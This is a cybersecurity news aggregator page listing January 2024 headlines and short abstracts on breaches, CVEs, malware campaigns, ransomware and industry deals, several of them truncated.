Progress Software’s MOVEit Meltdown: Uncovering the Fallout Full Text

Abstract

The data breach involving Progress Software’s MOVEit file-transfer service exposed millions of individuals and thousands of organizations, highlighting the far-reaching impact of supply chain cyberattacks.

Cyware

January 17, 2024 – Privacy

New iShutdown Method Exposes Hidden Spyware Like Pegasus on Your iPhone Full Text

Abstract

Cybersecurity researchers have identified a "lightweight method" called iShutdown for reliably identifying signs of spyware on Apple iOS devices, including notorious threats like NSO Group's Pegasus , QuaDream's Reign , and Intellexa's Predator . Kaspersky, which analyzed a set of iPhones that were compromised with Pegasus, said the infections left traces in a file named "Shutdown.log," a text-based system log file available on all iOS devices and which records every reboot event alongside its environment characteristics. "Compared to more time-consuming acquisition methods like forensic device imaging or a full iOS backup, retrieving the Shutdown.log file is rather straightforward," security researcher Maher Yamout said . "The log file is stored in a sysdiagnose (sysdiag) archive." The Russian cybersecurity firm said it identified entries in the log file that recorded instances where "sticky" processes, such as

The Hacker News

January 17, 2024 – Business

Snyk Acquires Helios for Runtime Visibility Full Text

Abstract

Snyk's acquisition of Helios marks its second move in developer-led application security posture management, following the previous acquisition of Enso Security, further strengthening its platform with prioritization and remediation capabilities.

Cyware

January 17, 2024 – Vulnerabilities

GitHub Rotates Keys After High-Severity Vulnerability Exposes Credentials Full Text

Abstract

GitHub has revealed that it has rotated some keys in response to a security vulnerability that could be potentially exploited to gain access to credentials within a production container. The Microsoft-owned subsidiary said it was made aware of the problem on December 26, 2023, and that it addressed the issue the same day, in addition to rotating all potentially exposed credentials out of an abundance of caution. The rotated keys include the GitHub commit signing key as well as GitHub Actions, GitHub Codespaces, and Dependabot customer encryption keys, necessitating users who rely on these keys to import the new ones. There is no evidence that the high-severity vulnerability, tracked as CVE-2024-0200 (CVSS score: 7.2), has been previously found and exploited in the wild. "This vulnerability is also present on GitHub Enterprise Server (GHES)," GitHub's Jacob DePriest said . "However, exploitation requires an authenticated user with an organization owner role

The Hacker News

January 17, 2024 – Cryptocurrency

Crypto Trading Firm Closes Shop After $8 Million NY State Fine Over Security Issues Full Text

Abstract

Genesis Global Trading violated its BitLicense terms, with late and inadequate cybersecurity risk assessments, and appeared deficient in filing suspicious activity reports for potential money laundering.

Cyware

January 17, 2024 – Vulnerabilities

Citrix Warns Admins to Immediately Patch NetScaler for Actively Exploited Zero-Days Full Text

Abstract

The vulnerabilities, tracked as CVE-2023-6548 and CVE-2023-6549, can lead to remote code execution or denial-of-service attacks, and specific recommendations for mitigating the risks are provided.

Cyware

January 17, 2024 – Solution

Adalanche: Open-Source Active Directory ACL Visualizer, Explorer Full Text

Abstract

The tool offers a visual attack graph representation of Active Directory in the browser, along with the ability to collect data from Windows machines and perform in-depth analysis.

Cyware

January 16, 2024 – Education

Three Ways to Combat Rising OAuth SAAS Attacks Full Text

Abstract

OAuth attacks are on the rise, and organizations must implement strong access controls, fortify identity security for user accounts, and monitor third-party app activity to prevent unauthorized access to SaaS resources.

Cyware

January 16, 2024 – Vulnerabilities

Alert: Over 178,000 SonicWall Firewalls Potentially Vulnerable to Exploits - Act Now Full Text

Abstract

Over 178,000 SonicWall firewalls exposed over the internet are exploitable to at least one of the two security flaws that could be potentially exploited to cause a denial-of-service (DoS) condition and remote code execution (RCE). "The two issues are fundamentally the same but exploitable at different HTTP URI paths due to reuse of a vulnerable code pattern," Jon Williams, a senior security engineer at Bishop Fox, said in a technical analysis shared with The Hacker News. The vulnerabilities in question are listed below - CVE-2022-22274 (CVSS score: 9.4) - A stack-based buffer overflow vulnerability in the SonicOS via HTTP request allows a remote, unauthenticated attacker to cause DoS or potentially result in code execution in the firewall. CVE-2023-0656 (CVSS score: 7.5) - A stack-based buffer overflow vulnerability in the SonicOS allows a remote, unauthenticated attacker to cause DoS, which could result in a crash. While there are no reports of exploitation of the flaws

The Hacker News

January 16, 2024 – Breach

Update: Cloud Vendor Returns Stolen Hospital Data Full Text

Abstract

A cloud services firm returned patient data stolen in a ransomware attack by the LockBit gang to a New York hospital alliance. The hospitals had sued LockBit as a legal maneuver to force the storage firm to return the data.

Cyware

January 16, 2024 – Insider Threat

Case Study: The Cookie Privacy Monster in Big Global Retail Full Text

Abstract

Explore how an advanced exposure management solution saved a major retail industry client from ending up on the naughty step due to a misconfiguration in its cookie management policy. This wasn't anything malicious, but with modern web environments being so complex, mistakes can happen, and non-compliance fines can be just an oversight away. Download the full case study here . As a child, did you ever get caught with your hand in the cookie jar and earn yourself a telling-off? Well, even if you can still remember being outed as a cookie monster, the punishments for today's thieving beasts are worse. Millions of dollars worse. Cookies are an essential part of modern web analytics. A cookie is a small piece of text data that records website visitor preferences along with their behaviors, and its job is to help personalize their browsing experience. Just as you needed parental consent to access the cookie jar all those years ago, your business now needs to obtain user consent before i

The Hacker News

January 16, 2024 – Phishing

Flipping the BEC Funnel: Phishing in the Age of GenAI Full Text

Abstract

The evolution of phishing techniques, including the use of advanced AI-driven tools, has led to a surge in highly personalized and convincing phishing attacks, posing a significant challenge to traditional email security solutions.

Cyware

January 16, 2024 – Malware

Remcos RAT Spreading Through Adult Games in New Attack Wave Full Text

Abstract

The remote access trojan (RAT) known as Remcos RAT has been found being propagated via webhards by disguising it as adult-themed games in South Korea. WebHard, short for web hard drive , is a popular online file storage system used to upload, download, and share files in the country. While webhards have been used in the past to deliver njRAT , UDP RAT, and DDoS botnet malware , the AhnLab Security Emergency Response Center's (ASEC) latest analysis shows that the technique has been adopted to distribute Remcos RAT. In these attacks, users are tricked into opening booby-trapped files by passing them off as adult games, which, when launched, execute malicious Visual Basic scripts in order to run an intermediate binary named "ffmpeg.exe." This results in the retrieval of Remcos RAT from an actor-controlled server. A sophisticated RAT, Remcos (aka Remote Control and Surveillance) facilitates unauthorized remote control and surveillance of compromised hosts, enablin

The Hacker News

January 16, 2024 – Government

DOD Unveils First-Ever National Defense Industrial Strategy Full Text

Abstract

The National Defense Industrial Strategy focuses on resilient supply chains, workforce readiness, flexible acquisitions, and economic deterrence to improve defense industrial ecosystem.

Cyware

January 16, 2024 – Cryptocurrency

Inferno Malware Masqueraded as Coinbase, Drained $87 Million from 137,000 Victims Full Text

Abstract

The operators behind the now-defunct Inferno Drainer created more than 16,000 unique malicious domains over a span of one year between 2022 and 2023. The scheme "leveraged high-quality phishing pages to lure unsuspecting users into connecting their cryptocurrency wallets with the attackers' infrastructure that spoofed Web3 protocols to trick victims into authorizing transactions," Singapore-headquartered Group-IB said in a report shared with The Hacker News. Inferno Drainer, which was active from November 2022 to November 2023 , is estimated to have reaped over $87 million in illicit profits by scamming more than 137,000 victims. The malware is part of a broader set of similar offerings that are available to affiliates under the scam-as-a-service (or drainer-as-a-service) model in exchange for a 20% cut of their earnings. What's more, customers of Inferno Drainer could either upload the malware to their own phishing sites, or make use of the developer's service for creatin

The Hacker News

January 16, 2024 – Attack

Anonymous Sudan Claims London Internet Exchange Attack Over Yemen Strikes Full Text

Abstract

The Russia-affiliated hacktivist group, Anonymous Sudan, claimed responsibility for a cyberattack on the London Internet Exchange (LINX) as a response to Britain's support for Israel and airstrikes on Yemen.

Cyware

January 16, 2024 – Vulnerabilities

Hackers Weaponize Windows Flaw to Deploy Crypto-Siphoning Phemedrone Stealer Full Text

Abstract

Threat actors have been observed leveraging a now-patched security flaw in Microsoft Windows to deploy an open-source information stealer called Phemedrone Stealer . "Phemedrone targets web browsers and data from cryptocurrency wallets and messaging apps such as Telegram, Steam, and Discord," Trend Micro researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun said . "It also takes screenshots and gathers system information regarding hardware, location, and operating system details. The stolen data is then sent to the attackers via Telegram or their command-and-control (C&C) server." The attacks leverage CVE-2023-36025 (CVSS score: 8.8), a security bypass vulnerability in Windows SmartScreen, that could be exploited by tricking a user into clicking on a specially crafted Internet Shortcut (.URL) or a hyperlink pointing to an Internet Shortcut file. The actively-exploited shortcoming was addressed by Microsoft as part of its November 2023 Patch Tuesday updates.

The Hacker News

January 16, 2024 – Criminals

Threat Actor Puts GEICO Database for Sale on the Dark Web Full Text

Abstract

The threat actor 'wangfei19860902055' advertised the sale of a database related to Government Employees Insurance Company (GEICO) on the dark web, containing 552,900 records with personal information. GEICO has not officially confirmed the breach.

Cyware

January 16, 2024 – Solution

Tsurugi Linux Tailors User Experience for Digital Forensics and OSINT Investigations Full Text

Abstract

Tsurugi Linux offers a user-friendly interface with a logical sequence of forensic analysis tools, including support for live forensics, post-mortem analysis, digital evidence acquisition, malware analysis, OSINT, and computer vision activities.

Cyware

January 15, 2024 – Attack

NoName Targets Websites of Financial Services, Transportation, and Telecom Firms in Lithuania Full Text

Abstract

Several prominent organizations in Lithuania, including Compensa Vienna Insurance Group, If Insurance, Lithuanian Roads Association, AD REM, INIT, and Balticum, have been targeted by the NoName ransomware group.

Cyware

January 15, 2024 – Vulnerabilities

Opera MyFlaw Bug Could Let Hackers Run ANY File on Your Mac or Windows Full Text

Abstract

Cybersecurity researchers have disclosed a security flaw in the Opera web browser for Microsoft Windows and Apple macOS that could be exploited to execute any file on the underlying operating system. The remote code execution vulnerability has been codenamed MyFlaw by the Guardio Labs research team owing to the fact that it takes advantage of a feature called My Flow that makes it possible to sync messages and files between mobile and desktop devices. "This is achieved through a controlled browser extension, effectively bypassing the browser's sandbox and the entire browser process," the company said in a statement shared with The Hacker News. The issue impacts both the Opera browser and Opera GX. Following responsible disclosure on November 17, 2023, it was addressed as part of updates shipped on November 22, 2023. My Flow features a chat-like interface to exchange notes and files, the latter of which can be opened via a web interface, meaning a file can be ex

The Hacker News

January 15, 2024 – Business

Anonymous Collective Launches Cyberattack on Bahrain Over Yemen Airstrikes Full Text

Abstract

The Anonymous Collective has launched a cyberattack on Bahrain in retaliation for its support of US and UK airstrikes on Yemen. Several Bahraini media outlets, including Akhbar al-Khaleej and Gulf Daily News, have been affected by the cyberattack.

Cyware

January 15, 2024 – Ransomware

3 Ransomware Group Newcomers to Watch in 2024 Full Text

Abstract

The ransomware industry surged in 2023 as it saw an alarming 55.5% increase in victims worldwide, reaching a staggering 4,368 cases. Figure 1: Year over year victims per quarter The rollercoaster ride from explosive growth in 2021 to a momentary dip in 2022 was just a teaser—2023 roared back with the same fervor as 2021, propelling existing groups and ushering in a wave of formidable newcomers. Figure 2: 2020-2023 ransomware victim count LockBit 3.0 maintained its number one spot with 1047 victims achieved through the Boeing attack, the Royal Mail Attack, and more. Alphv and Cl0p achieved far less success, with 445 and 384 victims attributed to them, respectively, in 2023. Figure 3: Top 3 active ransomware groups in 2023 These 3 groups were heavy contributors to the boom in ransomware attacks in 2023, but they were not the sole groups responsible. Many attacks came from emerging ransomware gangs such as 8Base , Rhysida, 3AM, Malaslocker, BianLian , Play, Akira ,

The Hacker News

January 15, 2024 – Malware

Azorult Malware Comes to the Fore in New Dark Web Campaign Full Text

Abstract

The Azorult malware, known for stealing sensitive data, has resurfaced with a sophisticated approach. It is distributed through malicious PDF files that contain a shortcut file.

Cyware

January 15, 2024 – Vulnerabilities

High-Severity Flaws Uncovered in Bosch Thermostats and Smart Nutrunners Full Text

Abstract

Multiple security vulnerabilities have been disclosed in Bosch BCC100 thermostats and Rexroth NXA015S-36V-B smart nutrunners that, if successfully exploited, could allow attackers to execute arbitrary code on affected systems. Romanian cybersecurity firm Bitdefender, which discovered the flaw in Bosch BCC100 thermostats last August, said the issue could be weaponized by an attacker to alter the device firmware and implant a rogue version. Tracked as CVE-2023-49722 (CVSS score: 8.3), the high-severity vulnerability was addressed by Bosch in November 2023. "A network port 8899 is always open in BCC101/BCC102/BCC50 thermostat products, which allows an unauthenticated connection from a local WiFi network," the company said in an advisory. The issue, at its core, impacts the WiFi microcontroller that acts as a network gateway for the thermostat's logic microcontroller. By exploiting the flaw, an attacker could send commands to the thermostat, including writing a malicious updat

The Hacker News

January 15, 2024 – Business

Microsoft to Keep All European Cloud Customers’ Personal Data Within EU Full Text

Abstract

Microsoft has announced that it will store all customer data in the European Union (EU) rather than transferring it abroad. This move is aimed at complying with varying privacy regulations across jurisdictions.

Cyware

January 15, 2024 – Malware

Balada Injector Infects Over 7,100 WordPress Sites Using Plugin Vulnerability Full Text

Abstract

Thousands of WordPress sites using a vulnerable version of the Popup Builder plugin have been compromised with a malware called Balada Injector . First documented by Doctor Web in January 2023, the campaign takes place in a series of periodic attack waves, weaponizing security flaws WordPress plugins to inject backdoor designed to redirect visitors of infected sites to bogus tech support pages, fraudulent lottery wins, and push notification scams. Subsequent findings unearthed by Sucuri have revealed the massive scale of the operation , which is said to have been active since 2017 and infiltrated no less than 1 million sites since then. The GoDaddy-owned website security company, which detected the latest Balada Injector activity on December 13, 2023, said it identified the injections on over 7,100 sites . These attacks take advantage of a high-severity flaw in Popup Builder ( CVE-2023-6000 , CVSS score: 8.8) – a plugin with more than 200,000 active installs – that was

The Hacker News

January 15, 2024 – Vulnerabilities

China Warns of Apple AirDrop De-Anonymization Flaw Full Text

Abstract

The Beijing Wangshendongjian Judicial Appraisal Institute Institute's claim that AirDrop's anonymization techniques can be easily circumvented raises concerns about the vulnerability of user identities and the potential for surveillance.

Cyware

January 15, 2024 – Denial Of Service

DDoS Attacks on the Environmental Services Industry Surge by 61,839% in 2023 Full Text

Abstract

The environmental services industry witnessed an "unprecedented surge" in HTTP-based distributed denial-of-service (DDoS) attacks, accounting for half of all its HTTP traffic. This marks a 61,839% increase in DDoS attack traffic year-over-year, web infrastructure and security company Cloudflare said in its DDoS threat report for 2023 Q4 published last week. "This surge in cyber attacks coincided with COP 28 , which ran from November 30th to December 12th, 2023," security researchers Omer Yoachimik and Jorge Pacheco said , describing it as a "disturbing trend in the cyber threat landscape." The uptick in HTTP attacks targeting environmental services websites is part of a larger trend observed annually over the past few years, specifically during COP 26 and COP 27, as well as other United Nations environment-related resolutions or announcements. "This recurring pattern underscores the growing intersection between environmental issues and cyber security, a nexus that is increasingl

The Hacker News

January 14, 2024 – Attack

New Findings Challenge Attribution in Denmark’s Energy Sector Cyberattacks Full Text

Abstract

The cyber attacks targeting the energy sector in Denmark last year may not have had the involvement of the Russia-linked Sandworm hacking group, new findings from Forescout show. The intrusions, which targeted around 22 Danish energy organizations in May 2023, occurred in two distinct waves, one which exploited a security flaw in Zyxel firewall (CVE-2023-28771) and a follow-on activity cluster that saw the attackers deploy Mirai botnet variants on infected hosts via an as-yet-unknown initial access vector. The first wave took place on May 11, while the second wave lasted from May 22 to 31, 2023. In one such attack detected on May 24, it was observed that the compromised system was communicating with IP addresses (217.57.80[.]18 and 70.62.153[.]174) that were previously used as command-and-control (C2) for the now-dismantled Cyclops Blink botnet. Forescout's closer examination of the attack campaign, however, has revealed that not only were the two waves unrelated, but also

The Hacker News

January 13, 2024 – Policy and Law

Fertility Test Lab Will Pay $1.25M to Settle Breach Lawsuit Full Text

Abstract

The settlement includes reimbursement for out-of-pocket losses, credit monitoring, identity theft insurance, and a cash settlement payment for affected individuals, with an additional payment for California residents.

Cyware

January 13, 2024 – Attack

British Cosmetics Firm Lush Confirms Cyberattack Full Text

Abstract

Lush has taken immediate steps to secure and screen all systems in order to contain the incident and limit its impact on their operations, while also informing relevant authorities about the incident.

Cyware

January 13, 2024 – Vulnerabilities

Critical RCE Vulnerability Uncovered in Juniper SRX Firewalls and EX Switches Full Text

Abstract

Juniper Networks has released updates to fix a critical remote code execution (RCE) vulnerability in its SRX Series firewalls and EX Series switches. The issue, tracked as CVE-2024-21591 , is rated 9.8 on the CVSS scoring system. "An out-of-bounds write vulnerability in J-Web of Juniper Networks Junos OS SRX Series and EX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS) or Remote Code Execution (RCE) and obtain root privileges on the device," the company said in an advisory. The networking equipment major, which is set to be acquired by Hewlett Packard Enterprise (HPE) for $14 billion, said the issue is caused by use of an insecure function allowing a bad actor to overwrite arbitrary memory. The flaw impacts the following versions, and has been fixed in versions 20.4R3-S9, 21.2R3-S7, 21.3R3-S5, 21.4R3-S5, 22.1R3-S4, 22.2R3-S3, 22.3R3-S2, 22.4R2-S2, 22.4R3, 23.2R1-S1, 23.2R2, 23.4R1, and later - Junos OS versions earlier than 20.4R

The Hacker News

January 13, 2024 – General

Report: Elevated Ransomware Activity Hit Nearly 5,200 Organizations in 2023 Full Text

Abstract

The most active ransomware groups in 2023 included AlphV, BianLian, Clop, LockBit 3.0, and Play, with AlphV being the most prolific and receiving substantial ransom payments.

Cyware

January 13, 2024 – Criminals

29-Year-Old Ukrainian Cryptojacking Kingpin Arrested for Exploiting Cloud Services Full Text

Abstract

A 29-year-old Ukrainian national has been arrested in connection with running a "sophisticated cryptojacking scheme," netting them over $2 million (€1.8 million) in illicit profits. The person, described as the "mastermind" behind the operation, was apprehended in Mykolaiv, Ukraine, on January 9 by the National Police of Ukraine with support from Europol and an unnamed cloud service provider following "months of intensive collaboration." "A cloud provider approached Europol back in January 2023 with information regarding compromised cloud user accounts of theirs," Europol said , adding it shared the intelligence with the Ukrainian authorities. As part of the probe, three properties were searched to unearth evidence against the suspect. Cryptojacking refers to a type of cyber crime that entails the unauthorized use of a person's or organization's computing resources to mine cryptocurrencies. On the cloud, such attacks are typically carried out by infiltrating the infrastructur

The Hacker News

January 13, 2024 – Criminals

Medusa Ransomware Gang Targets Nonprofit Providing Clean Water to World’s Poorest Full Text

Abstract

Water for People, a nonprofit focused on improving access to clean water, has been targeted by the Medusa ransomware group, highlighting the vulnerability of even non-profit organizations to cyberattacks.

Cyware

January 13, 2024 – General

APIs are Increasingly Becoming Attractive Targets Full Text

Abstract

APIs are being used more than ever by businesses to build and provide better sites, apps, and services to consumers. However, if APIs are not managed or secured properly, they can be exploited by hackers to steal sensitive information.

Cyware

January 13, 2024 – Hacker

Volt Typhoon Ramps Up Malicious Activity Against Critical Infrastructure Full Text

Abstract

Volt Typhoon is using compromised routers as a command-and-control network and deploying a new web shell called "fy.sh" on targeted Cisco routers, indicating a highly active and sophisticated operation.

Cyware

January 13, 2024 – Vulnerabilities

Vulnerability Affecting Smart Thermostats Patched by Bosch Full Text

Abstract

German technology manufacturer Bosch has fixed a vulnerability in its popular line of smart thermostats that allowed attackers to replace the device firmware with a rogue version.

Cyware

January 13, 2024 – Solution

Purple Teaming and the Role of Threat Categorization Full Text

Abstract

Purple team assessments, where red and blue teams collaborate, can provide a more comprehensive approach to security assessments, but they need to evolve to account for the multitude of attack technique variants.

Cyware

January 13, 2024 – Breach

Update: Ransomware Attack on US Navy Shipbuilder Leaked Information of Nearly 17,000 People Full Text

Abstract

Nearly 17,000 people had their personal information exposed in a ransomware attack on Fincantieri Marine Group. The attack, which occurred in April 2023, caused production issues and disrupted the company's computer systems.

Cyware

January 13, 2024 – Breach

Saudi Foreign Affairs Ministry Allegedly Hit by Major Data Breach, Impacting Over 1.4 Million Employees Full Text

Abstract

The Ministry of Foreign Affairs for Saudi Arabia reportedly experienced a major data breach, exposing the personal information of over 1.4 million employees, including names, contact details, and job titles.

Cyware

January 12, 2024 – Attack

Nation-State Actors Weaponize Ivanti VPN Zero-Days, Deploying 5 Malware Families Full Text

Abstract

As many as five different malware families were deployed by suspected nation-state actors as part of post-exploitation activities leveraging two zero-day vulnerabilities in Ivanti Connect Secure (ICS) VPN appliances since early December 2023. "These families allow the threat actors to circumvent authentication and provide backdoor access to these devices," Mandiant said in an analysis published this week. The Google-owned threat intelligence firm is tracking the threat actor under the moniker UNC5221 . The attacks leverage an exploit chain comprising an authentication bypass flaw (CVE-2023-46805) and a code injection vulnerability (CVE-2024-21887) to take over susceptible instances. Volexity, which attributed the activity to a suspected Chinese espionage actor named UTA0178, said the twin flaws were used to gain initial access, deploy webshells, backdoor legitimate files, capture credentials and configuration data, and pivot further into the victim environment. Ac

The Hacker News

January 12, 2024 – Ransomware

Medusa Ransomware on the Rise: From Data Leaks to Multi-Extortion Full Text

Abstract

The threat actors associated with the Medusa ransomware have ramped up their activities following the debut of a dedicated data leak site on the dark web in February 2023 to publish sensitive data of victims who are unwilling to agree to their demands. "As part of their multi-extortion strategy, this group will provide victims with multiple options when their data is posted on their leak site, such as time extension, data deletion or download of all the data," Palo Alto Networks Unit 42 researchers Anthony Galiette and Doel Santos said in a report shared with The Hacker News. "All of these options have a price tag depending on the organization impacted by this group." Medusa (not to be confused with Medusa Locker) refers to a ransomware family that appeared in late 2022 before coming into prominence in 2023. It's known for opportunistically targeting a wide range of industries such as high technology, education, manufacturing, healthcare, and retail. As many as 74 organization

The Hacker News

January 12, 2024 – Solution

Applying the Tyson Principle to Cybersecurity: Why Attack Simulation is Key to Avoiding a KO Full Text

Abstract

Picture a cybersecurity landscape where defenses are impenetrable, and threats are nothing more than mere disturbances deflected by a strong shield. Sadly, this image of fortitude remains a pipe dream despite its comforting nature. In the security world, preparedness is not just a luxury but a necessity. In this context, Mike Tyson's famous adage, "Everyone has a plan until they get punched in the face," lends itself to our arena - cyber defenses must be battle-tested to stand a chance. Tyson's words capture the paradox of readiness in cybersecurity: too often, untested cyber defenses can create a false sense of security, leading to dire consequences when real threats land a blow. This is where Breach and Attack Simulation (BAS), a proactive tool in any organization's cybersecurity arsenal, comes into play. When Cybersecurity Meets the Punch - The Assumption Problem Assumptions are the hidden icebergs in cybersecurity's vast ocean. Although we might believ

The Hacker News

January 11, 2024 – Business

Chertoff Group Affiliate Completes Trustwave Acquisition Full Text

Abstract

MC2 Security Fund has completed its acquisition of Trustwave, a managed security services provider, expanding its reach and placing Trustwave in front of Chertoff Group customers in the commercial and public sectors.

Cyware

January 11, 2024 – General

Threat Actors Increasingly Abusing GitHub for Malicious Purposes Full Text

Abstract

The ubiquity of GitHub in information technology (IT) environments has made it a lucrative choice for threat actors to host and deliver malicious payloads and act as dead drop resolvers , command-and-control, and data exfiltration points. "Using GitHub services for malicious infrastructure allows adversaries to blend in with legitimate network traffic, often bypassing traditional security defenses and making upstream infrastructure tracking and actor attribution more difficult," Recorded Future said in a report shared with The Hacker News. The cybersecurity firm described the approach as "living-off-trusted-sites" (LOTS), a spin on the living-off-the-land (LotL) techniques often adopted by threat actors to conceal rogue activity and fly under the radar. Prominent among the methods by which GitHub is abused relates to payload delivery , with some actors leveraging its features for command-and-control (C2) obfuscation. Last month, ReversingLabs detailed a number of rogue

The Hacker News

January 11, 2024 – Phishing

Black Basta-Affiliate Spreads Pikabot Full Text

Abstract

Threat group Water Curupira, known for its Cobalt Strike backdoors, recently transitioned to using Pikabot malware in phishing campaigns. Pikabot witnessed a surge in activity in Q4 2023, potentially serving as a replacement for Qakbot after its takedown. Users must exercise caution with email atta ... Read More

Cyware

January 11, 2024 – Vulnerabilities

New PoC Exploit for Apache OfBiz Vulnerability Poses Risk to ERP Systems Full Text

Abstract

Cybersecurity researchers have developed a proof-of-concept (PoC) code that exploits a recently disclosed critical flaw in the Apache OfBiz open-source Enterprise Resource Planning (ERP) system to execute a memory-resident payload. The vulnerability in question is CVE-2023-51467 (CVSS score: 9.8), a bypass for another severe shortcoming in the same software ( CVE-2023-49070 , CVSS score: 9.8) that could be weaponized to bypass authentication and remotely execute arbitrary code. While it was fixed in Apache OFbiz version 18.12.11 released last month, threat actors have been observed attempting to exploit the flaw, targeting vulnerable instances. The latest findings from VulnCheck show that CVE-2023-51467 can be exploited to execute a payload directly from memory, leaving little to no traces of malicious activity. Security flaws disclosed in Apache OFBiz (e.g., CVE-2020-9496 ) have been exploited by threat actors in the past, including by threat actors associated with th

The Hacker News

January 11, 2024 – Breach

HMG Healthcare Discloses Data Breach Affecting 40 Affiliated Nursing Facilities Full Text

Abstract

The breach occurred in August 2023 when threat actors gained unauthorized access to a company server and stole unencrypted files containing medical records, personal information, and employment records.

Cyware

January 11, 2024 – Malware

New Python-based FBot Hacking Toolkit Aims at Cloud and SaaS Platforms Full Text

Abstract

A new Python-based hacking tool called FBot has been uncovered targeting web servers, cloud services, content management systems (CMS), and SaaS platforms such as Amazon Web Services (AWS), Microsoft 365, PayPal, Sendgrid, and Twilio. "Key features include credential harvesting for spamming attacks, AWS account hijacking tools, and functions to enable attacks against PayPal and various SaaS accounts," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News. FBot is the latest addition to the list of cloud hacking tools like AlienFox, GreenBot (aka Maintance), Legion , and Predator , the latter four of which share code-level overlaps with AndroxGh0st. SentinelOne described FBot as "related but distinct from these families," owing to the fact that it does not reference any source code from AndroxGh0st, although it exhibits similarities with Legion, which first came to light last year. The end goal of the tool is to hijack cloud, SaaS, and

The Hacker News

January 11, 2024 – Law Article

French Hacker From ‘ShinyHunters’ Group Sentenced to Three Years in US Prison Full Text

Abstract

A 22-year-old French hacker has been sentenced to three years in U.S. federal prison for his involvement in the ShinyHunters hacking group and must pay $5 million in restitution.

Cyware

January 11, 2024 – General

There is a Ransomware Armageddon Coming for Us All Full Text

Abstract

Generative AI will enable anyone to launch sophisticated phishing attacks that only Next-generation MFA devices can stop The least surprising headline from 2023 is that ransomware again set new records for a number of incidents and the damage inflicted. We saw new headlines every week, which included a who's-who of big-name organizations. If MGM, Johnson Controls, Chlorox, Hanes Brands, Caesars Palace, and so many others cannot stop the attacks, how will anyone else? Phishing-driven ransomware is the cyber threat that looms larger and more dangerous than all others. CISA and Cisco report that 90% of data breaches are the result of phishing attacks and monetary losses that exceed $10 billion in total. A report from Splunk revealed that 96 percent of companies fell victim to at least one phishing attack in the last 12 months and 83 percent suffered two or more. Protect your organization from phishing and ransomware by learning about the benefits of Next-Generation MFA. Download th

The Hacker News

January 11, 2024 – Breach

Thousands of WordPress Sites with Popup Builder Plugin Compromised by Balada Injector Full Text

Abstract

A stored XSS flaw in the Popup Builder WordPress plugin has been exploited by the Balada Injector campaign. The campaign injects malicious code into websites using older versions of the plugin, with over 6,200 sites currently affected.

Cyware

January 11, 2024 – Malware

Atomic Stealer Gets an Upgrade - Targeting Mac Users with Encrypted Payload Full Text

Abstract

Cybersecurity researchers have identified an updated version of a macOS information stealer called Atomic (or AMOS), indicating that the threat actors behind the malware are actively enhancing its capabilities. "It looks like Atomic Stealer was updated around mid to late December 2023, where its developers introduced payload encryption in an effort to bypass detection rules," Malwarebytes' Jérôme Segura said in a Wednesday report. Atomic Stealer first emerged in April 2023 for a monthly subscription of $1,000. It's capable of harvesting sensitive information from a compromised host, including Keychain passwords, session cookies, files, crypto wallets, system metadata, and the machine's password via a fake prompt. Over the past several months, the malware has been observed propagated via malvertising and compromised sites under the guise of legitimate software and web browser updates. Malwarebytes' latest analysis shows that Atomic Stealer is no

The Hacker News

January 11, 2024 – Business

ExtraHop Raises $100M in Growth Capital Full Text

Abstract

Seattle-based company ExtraHop has raised $100 million in growth capital for its cloud-native network detection and response platform. The funding will be used to expand operations and business reach.

Cyware

January 11, 2024 – Breach

Mandiant’s X Account Was Hacked Using Brute-Force Attack Full Text

Abstract

The compromise of Mandiant's X (formerly Twitter) account last week was likely the result of a "brute-force password attack," attributing the hack to a drainer-as-a-service (DaaS) group. "Normally, [two-factor authentication] would have mitigated this, but due to some team transitions and a change in X's 2FA policy , we were not adequately protected," the threat intelligence firm said in a post shared on X. The attack, which took place on January 3, 2023, enabled the threat actor to take control of the company's X account and distribute links to a phishing page hosting a cryptocurrency drainer tracked as CLINKSINK. Drainers refer to malicious scripts and smart contracts that facilitate the theft of digital assets from the victim's wallets after they are tricked into approving the transactions. According to the Google-owned subsidiary, multiple threat actors are believed to have leveraged CLINKSINK since December 2023 to siphon funds and tok

The Hacker News

January 11, 2024 – Botnet

New NoaBot Botnet Spreads an Illicit Cryptominer on Linux Systems Full Text

Abstract

The malware's obfuscation and custom code suggest mature threat actors, but the inclusion of childish elements complicates attribution, making it difficult to determine the exact nature of the operation.

Cyware

January 10, 2024 – General

Fallout Mounting From Recent Major Health Data Hacks Full Text

Abstract

Several high-profile health data hacks, including those affecting medical transcription vendor Perry Johnson and Associates and hospital chain Prospect Medical Holdings, are resulting in growing lists of affected individuals and triggering lawsuits.

Cyware

January 10, 2024 – Botnet

NoaBot: Latest Mirai-Based Botnet Targeting SSH Servers for Crypto Mining Full Text

Abstract

A new Mirai-based botnet called NoaBot is being used by threat actors as part of a crypto mining campaign since the beginning of 2023. "The capabilities of the new botnet, NoaBot, include a wormable self-spreader and an SSH key backdoor to download and execute additional binaries or spread itself to new victims," Akamai security researcher Stiv Kupchik said in a report shared with The Hacker News. Mirai , which had its source code leaked in 2016, has been the progenitor of a number of botnets, the most recent being InfectedSlurs , which is capable of mounting distributed denial-of-service (DDoS) attacks. There are indications that NoaBot could be linked to another botnet campaign involving a Rust-based malware family known as P2PInfect , which recently received an update to target routers and IoT devices. This is based on the fact that threat actors have also experimented with dropping P2PInfect in place of NoaBot in recent attacks targeting SSH servers, indicating likely at

The Hacker News

January 10, 2024 – General

DDoS Attack Traffic Surged in 2023, Cloudflare Finds Full Text

Abstract

Distributed denial of service (DDoS) attacks reached an all-time high in 2023, with a significant increase in the number and intensity of attacks, driven by the exploitation of vulnerabilities like the HTTP/2 Rapid Reset.

Cyware

January 10, 2024 – General

Getting off the Attack Surface Hamster Wheel: Identity Can Help Full Text

Abstract

IT professionals have developed a sophisticated understanding of the enterprise attack surface – what it is, how to quantify it and how to manage it. The process is simple: begin by thoroughly assessing the attack surface, encompassing the entire IT environment. Identify all potential entry and exit points where unauthorized access could occur. Strengthen these vulnerable points using available market tools and expertise to achieve the desired cybersecurity posture. While conceptually straightforward, this is an incredibly tedious task that consumes the working hours of CISOs and their organizations. Both the enumeration and the fortification pose challenges: large organizations use a vast array of technologies, such as server and endpoint platforms, network devices, and business apps. Reinforcing each of these components becomes a frustrating exercise in integration with access control, logging, patching, monitoring, and more, creating a seemingly endless list of tasks. However

The Hacker News

January 10, 2024 – Phishing

Meet Ika & Sal: The Bulletproof Hosting Duo from Hell Full Text

Abstract

